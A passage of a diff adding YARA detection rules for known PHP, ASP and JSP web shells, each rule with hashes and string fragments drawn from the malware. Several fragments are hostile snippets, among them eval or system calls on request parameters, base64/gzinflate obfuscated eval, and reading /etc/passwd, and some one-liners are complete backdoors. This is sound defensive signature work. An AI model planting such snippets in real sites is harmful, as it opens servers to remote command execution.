+		$s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">    " fullword
+	condition:
+		all of them
+}
+rule webshell_asp_1 {
+	meta:
+		description = "Web Shell - file 1.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8991148adf5de3b8322ec5d78cb01bdb"
+	strings:
+		$s4 = "!22222222222222222222222222222222222222222222222222" fullword
+		$s8 = "<%eval request(\"pass\")%>" fullword
+	condition:
+		all of them
+}
+rule webshell_ASP_tool {
+	meta:
+		description = "Web Shell - file tool.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "4ab68d38527d5834e9c1ff64407b34fb"
+	strings:
+		$s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\""
+		$s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='\" "
+		$s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas"
+	condition:
+		2 of them
+}
+rule webshell_cmd_win32 {
+	meta:
+		description = "Web Shell - file cmd_win32.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "cc4d4d6cc9a25984aa9a7583c7def174"
+	strings:
+		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam"
+		$s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+	condition:
+		2 of them
+}
+rule webshell_jsp_jshell {
+	meta:
+		description = "Web Shell - file jshell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "124b22f38aaaf064cef14711b2602c06"
+	strings:
+		$s0 = "kXpeW[\"" fullword
+		$s4 = "[7b:g0W@W<" fullword
+		$s5 = "b:gHr,g<" fullword
+		$s8 = "RhV0W@W<" fullword
+		$s9 = "S_MR(u7b" fullword
+	condition:
+		all of them
+}
+rule webshell_ASP_zehir4 {
+	meta:
+		description = "Web Shell - file zehir4.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "7f4e12e159360743ec016273c3b9108c"
+	strings:
+		$s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/"
+	condition:
+		all of them
+}
+rule webshell_wsb_idc {
+	meta:
+		description = "Web Shell - file idc.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "7c5b1b30196c51f1accbffb80296395f"
+	strings:
+		$s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword
+		$s3 = "{eval($_GET['idc']);}" fullword
+	condition:
+		1 of them
+}
+rule webshell_cpg_143_incl_xpl {
+	meta:
+		description = "Web Shell - file cpg_143_incl_xpl.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5937b131b67d8e0afdbd589251a5e176"
+	strings:
+		$s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA"
+		$s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time"
+	condition:
+		1 of them
+}
+rule webshell_mumaasp_com {
+	meta:
+		description = "Web Shell - file mumaasp.com.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "cce32b2e18f5357c85b6d20f564ebd5d"
+	strings:
+		$s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR"
+	condition:
+		all of them
+}
+rule webshell_php_404 {
+	meta:
+		description = "Web Shell - file 404.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ced050df5ca42064056a7ad610a191b3"
+	strings:
+		$s0 = "$pass = md5(md5(md5($pass)));" fullword
+	condition:
+		all of them
+}
+rule webshell_webshell_cnseay_x {
+	meta:
+		description = "Web Shell - file webshell-cnseay-x.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a0f9f7f5cd405a514a7f3be329f380e5"
+	strings:
+		$s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_"
+	condition:
+		all of them
+}
+rule webshell_asp_up {
+	meta:
+		description = "Web Shell - file up.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "f775e721cfe85019fe41c34f47c0d67c"
+	strings:
+		$s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio"
+		$s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword
+	condition:
+		1 of them
+}
+rule webshell_phpkit_0_1a_odd {
+	meta:
+		description = "Web Shell - file odd.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3c30399e7480c09276f412271f60ed01"
+	strings:
+		$s1 = "include('php://input');" fullword
+		$s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+		$s4 = "// uses include('php://input') to execute arbritary code" fullword
+		$s5 = "// php://input based backdoor" fullword
+	condition:
+		2 of them
+}
+rule webshell_ASP_cmd {
+	meta:
+		description = "Web Shell - file cmd.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "97af88b478422067f23b001dd06d56a9"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_Shell_x3 {
+	meta:
+		description = "Web Shell - file PHP Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+	strings:
+		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
+		$s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+		$s9 = "if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset("
+	condition:
+		2 of them
+}
+rule webshell_PHP_g00nv13 {
+	meta:
+		description = "Web Shell - file g00nv13.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "35ad2533192fe8a1a76c3276140db820"
+	strings:
+		$s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas"
+		$s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p"
+	condition:
+		all of them
+}
+rule webshell_php_h6ss {
+	meta:
+		description = "Web Shell - file h6ss.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "272dde9a4a7265d6c139287560328cd5"
+	strings:
+		$s0 = "<?php eval(gzuncompress(base64_decode(\""
+	condition:
+		all of them
+}
+rule webshell_jsp_zx {
+	meta:
+		description = "Web Shell - file zx.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "67627c264db1e54a4720bd6a64721674"
+	strings:
+		$s0 = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g"
+	condition:
+		all of them
+}
+rule webshell_Ani_Shell {
+	meta:
+		description = "Web Shell - file Ani-Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "889bfc9fbb8ee7832044fc575324d01a"
+	strings:
+		$s0 = "$Python_CODE = \"I"
+		$s6 = "$passwordPrompt = \"\\n================================================="
+		$s7 = "fputs ($sockfd ,\"\\n==============================================="
+	condition:
+		1 of them
+}
+rule webshell_jsp_k8cmd {
+	meta:
+		description = "Web Shell - file k8cmd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b39544415e692a567455ff033a97a682"
+	strings:
+		$s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_cmd {
+	meta:
+		description = "Web Shell - file cmd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5391c4a8af1ede757ba9d28865e75853"
+	strings:
+		$s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_k81 {
+	meta:
+		description = "Web Shell - file k81.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "41efc5c71b6885add9c1d516371bd6af"
+	strings:
+		$s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword
+		$s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword
+	condition:
+		1 of them
+}
+rule webshell_ASP_zehir {
+	meta:
+		description = "Web Shell - file zehir.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0061d800aee63ccaf41d2d62ec15985d"
+	strings:
+		$s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&"
+	condition:
+		all of them
+}
+rule webshell_Worse_Linux_Shell {
+	meta:
+		description = "Web Shell - file Worse Linux Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+	strings:
+		$s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD"
+	condition:
+		all of them
+}
+rule webshell_zacosmall {
+	meta:
+		description = "Web Shell - file zacosmall.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5295ee8dc2f5fd416be442548d68f7a6"
+	strings:
+		$s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>"
+	condition:
+		all of them
+}
+rule webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
+	meta:
+		description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+	strings:
+		$s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+	condition:
+		all of them
+}
+rule webshell_redirect {
+	meta:
+		description = "Web Shell - file redirect.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "97da83c6e3efbba98df270cc70beb8f8"
+	strings:
+		$s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" "
+	condition:
+		all of them
+}
+rule webshell_jsp_cmdjsp {
+	meta:
+		description = "Web Shell - file cmdjsp.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b815611cc39f17f05a73444d699341d4"
+	strings:
+		$s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+	condition:
+		all of them
+}
+rule webshell_Java_Shell {
+	meta:
+		description = "Web Shell - file Java Shell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
+	strings:
+		$s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword
+		$s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword
+	condition:
+		1 of them
+}
+rule webshell_asp_1d {
+	meta:
+		description = "Web Shell - file 1d.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "fad7504ca8a55d4453e552621f81563c"
+	strings:
+		$s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO"
+	condition:
+		all of them
+}
+rule webshell_jsp_IXRbE {
+	meta:
+		description = "Web Shell - file IXRbE.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e26e7e0ebc6e7662e1123452a939e2cd"
+	strings:
+		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
+	condition:
+		all of them
+}
+rule webshell_PHP_G5 {
+	meta:
+		description = "Web Shell - file G5.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "95b4a56140a650c74ed2ec36f08d757f"
+	strings:
+		$s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op"
+	condition:
+		all of them
+}
+rule webshell_PHP_r57142 {
+	meta:
+		description = "Web Shell - file r57142.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0911b6e6b8f4bcb05599b2885a7fe8a8"
+	strings:
+		$s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_tree {
+	meta:
+		description = "Web Shell - file tree.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa"
+	strings:
+		$s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki"
+		$s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ"
+	condition:
+		all of them
+}
+rule webshell_C99madShell_v_3_0_smowu {
+	meta:
+		description = "Web Shell - file smowu.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "74e1e7c7a6798f1663efb42882b85bee"
+	strings:
+		$s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for"
+		$s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty"
+	condition:
+		1 of them
+}
+rule webshell_simple_backdoor {
+	meta:
+		description = "Web Shell - file simple-backdoor.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "f091d1b9274c881f8e41b2f96e6b9936"
+	strings:
+		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+		$s1 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s4 = "system($cmd);" fullword
+	condition:
+		2 of them
+}
+rule webshell_PHP_404 {
+	meta:
+		description = "Web Shell - file 404.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "078c55ac475ab9e028f94f879f548bca"
+	strings:
+		$s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)"
+	condition:
+		all of them
+}
+rule webshell_Macker_s_Private_PHPShell {
+	meta:
+		description = "Web Shell - file Macker's Private PHPShell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e24cbf0e294da9ac2117dc660d890bb9"
+	strings:
+		$s3 = "echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>Server's PHP Version:&n"
+		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
+		$s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+	condition:
+		all of them
+}
+rule webshell_Antichat_Shell_v1_3_2 {
+	meta:
+		description = "Web Shell - file Antichat Shell v1.3.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "40d0abceba125868be7f3f990f031521"
+	strings:
+		$s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m"
+	condition:
+		all of them
+}
+rule webshell_Safe_mode_breaker {
+	meta:
+		description = "Web Shell - file Safe mode breaker.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5bd07ccb1111950a5b47327946bfa194"
+	strings:
+		$s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is("
+		$s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)."
+	condition:
+		1 of them
+}
+rule webshell_Sst_Sheller {
+	meta:
+		description = "Web Shell - file Sst-Sheller.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d93c62a0a042252f7531d8632511ca56"
+	strings:
+		$s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>"
+		$s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)"
+	condition:
+		all of them
+}
+rule webshell_jsp_list {
+	meta:
+		description = "Web Shell - file list.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1ea290ff4259dcaeb680cec992738eda"
+	strings:
+		$s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+		$s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn"
+		$s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword
+	condition:
+		all of them
+}
+rule webshell_PHPJackal_v1_5 {
+	meta:
+		description = "Web Shell - file PHPJackal v1.5.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d76dc20a4017191216a0315b7286056f"
+	strings:
+		$s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form"
+		$s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr"
+	condition:
+		all of them
+}
+rule webshell_customize {
+	meta:
+		description = "Web Shell - file customize.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d55578eccad090f30f5d735b8ec530b1"
+	strings:
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+	condition:
+		all of them
+}
+rule webshell_s72_Shell_v1_1_Coding {
+	meta:
+		description = "Web Shell - file s72 Shell v1.1 Coding.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c2e8346a5515c81797af36e7e4a3828e"
+	strings:
+		$s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya "
+	condition:
+		all of them
+}
+rule webshell_jsp_sys3 {
+	meta:
+		description = "Web Shell - file sys3.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b3028a854d07674f4d8a9cf2fb6137ec"
+	strings:
+		$s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword
+		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+		$s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_guige02 {
+	meta:
+		description = "Web Shell - file guige02.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a3b8b2280c56eaab777d633535baf21d"
+	strings:
+		$s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff"
+		$s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private"
+	condition:
+		all of them
+}
+rule webshell_php_ghost {
+	meta:
+		description = "Web Shell - file ghost.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "38dc8383da0859dca82cf0c943dbf16d"
+	strings:
+		$s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'"
+		$s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***"
+		$s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword
+	condition:
+		all of them
+}
+rule webshell_WinX_Shell {
+	meta:
+		description = "Web Shell - file WinX Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "17ab5086aef89d4951fe9b7c7a561dda"
+	strings:
+		$s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam"
+		$s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </"
+	condition:
+		all of them
+}
+rule webshell_Crystal_Crystal {
+	meta:
+		description = "Web Shell - file Crystal.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "fdbf54d5bf3264eb1c4bff1fac548879"
+	strings:
+		$s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value"
+		$s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f"
+	condition:
+		all of them
+}
+rule webshell_r57_1_4_0 {
+	meta:
+		description = "Web Shell - file r57.1.4.0.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "574f3303e131242568b0caf3de42f325"
+	strings:
+		$s4 = "@ini_set('error_log',NULL);" fullword
+		$s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+		$s7 = "@ini_restore(\"disable_functions\");" fullword
+		$s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_hsxa1 {
+	meta:
+		description = "Web Shell - file hsxa1.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5686d5a38c6f5b8c55095af95c2b0244"
+	strings:
+		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
+	condition:
+		all of them
+}
+rule webshell_asp_ajn {
+	meta:
+		description = "Web Shell - file ajn.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "aaafafc5d286f0bff827a931f6378d04"
+	strings:
+		$s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword
+		$s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve"
+	condition:
+		all of them
+}
+rule webshell_php_cmd {
+	meta:
+		description = "Web Shell - file cmd.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c38ae5ba61fd84f6bbbab98d89d8a346"
+	strings:
+		$s0 = "if($_GET['cmd']) {" fullword
+		$s1 = "// cmd.php = Command Execution" fullword
+		$s7 = "  system($_GET['cmd']);" fullword
+	condition:
+		all of them
+}
+rule webshell_asp_list {
+	meta:
+		description = "Web Shell - file list.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1cfa493a165eb4b43e6d4cc0f2eab575"
+	strings:
+		$s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword
+		$s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_co {
+	meta:
+		description = "Web Shell - file co.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "62199f5ac721a0cb9b28f465a513874c"
+	strings:
+		$s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword
+		$s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_150 {
+	meta:
+		description = "Web Shell - file 150.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "400c4b0bed5c90f048398e1d268ce4dc"
+	strings:
+		$s0 = "HJ3HjqxclkZfp"
+		$s1 = "<? eval(gzinflate(base64_decode('" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_cmdjsp_2 {
+	meta:
+		description = "Web Shell - file cmdjsp.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1b5ae3649f03784e2a5073fa4d160c8b"
+	strings:
+		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+		$s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_c37 {
+	meta:
+		description = "Web Shell - file c37.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d01144c04e7a46870a8dd823eb2fe5c8"
+	strings:
+		$s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),"
+		$s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],"
+	condition:
+		all of them
+}
+rule webshell_PHP_b37 {
+	meta:
+		description = "Web Shell - file b37.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0421445303cfd0ec6bc20b3846e30ff0"
+	strings:
+		$s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc"
+	condition:
+		all of them
+}
+rule webshell_php_backdoor {
+	meta:
+		description = "Web Shell - file php-backdoor.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+	strings:
+		$s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword
+		$s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+	condition:
+		all of them
+}
+rule webshell_asp_dabao {
+	meta:
+		description = "Web Shell - file dabao.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3919b959e3fa7e86d52c2b0a91588d5d"
+	strings:
+		$s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location =&#039;\" &"
+		$s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-"
+	condition:
+		all of them
+}
+rule webshell_php_2 {
+	meta:
+		description = "Web Shell - file 2.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "267c37c3a285a84f541066fc5b3c1747"
+	strings:
+		$s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword
+	condition:
+		all of them
+}
+rule webshell_asp_cmdasp {
+	meta:
+		description = "Web Shell - file cmdasp.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "57b51418a799d2d016be546f399c2e9b"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+	condition:
+		all of them
+}
+rule webshell_spjspshell {
+	meta:
+		description = "Web Shell - file spjspshell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d39d51154aaad4ba89947c459a729971"
+	strings:
+		$s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:"
+	condition:
+		all of them
+}
+rule webshell_jsp_action {
+	meta:
+		description = "Web Shell - file action.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5a7d931094f5570aaf5b7b3b06c3d8c0"
+	strings:
+		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
+		$s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
+	condition:
+		all of them
+}
+rule webshell_Inderxer {
+	meta:
+		description = "Web Shell - file Inderxer.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "9ea82afb8c7070817d4cdf686abe0300"
+	strings:
+		$s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+	condition:
+		all of them
+}
+rule webshell_asp_Rader {
+	meta:
+		description = "Web Shell - file Rader.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ad1a362e0a24c4475335e3e891a01731"
+	strings:
+		$s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0"
+		$s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 "
+	condition:
+		all of them
+}
+rule webshell_c99_madnet_smowu {
+	meta:
+		description = "Web Shell - file smowu.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3aaa8cad47055ba53190020311b0fb83"
+	strings:
+		$s0 = "//Authentication" fullword
+		$s1 = "$login = \"" fullword
+		$s2 = "eval(gzinflate(base64_decode('"
+		$s4 = "//Pass" 
+		$s5 = "$md5_pass = \"" 
+		$s6 = "//If no pass then hash"
+	condition:
+		all of them
+}
+rule webshell_php_moon {
+	meta:
+		description = "Web Shell - file moon.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2a2b1b783d3a2fa9a50b1496afa6e356"
+	strings:
+		$s2 = "echo '<option value=\"create function backshell returns string soname"
+		$s3 = "echo      \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\""
+		$s8 = "echo '<option value=\"select cmdshell(\\'net user "
+	condition:
+		2 of them
+}
+rule webshell_jsp_jdbc {
+	meta:
+		description = "Web Shell - file jdbc.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "23b0e6f91a8f0d93b9c51a2a442119ce"
+	strings:
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+	condition:
+		all of them
+}
+rule webshell_minupload {
+	meta:
+		description = "Web Shell - file minupload.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ec905a1395d176c27f388d202375bdf9"
+	strings:
+		$s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">   " fullword
+		$s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"
+	condition:
+		all of them
+}
+rule webshell_ELMALISEKER_Backd00r {
+	meta:
+		description = "Web Shell - file ELMALISEKER Backd00r.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3aa403e0a42badb2c23d4a54ef43e2f4"
+	strings:
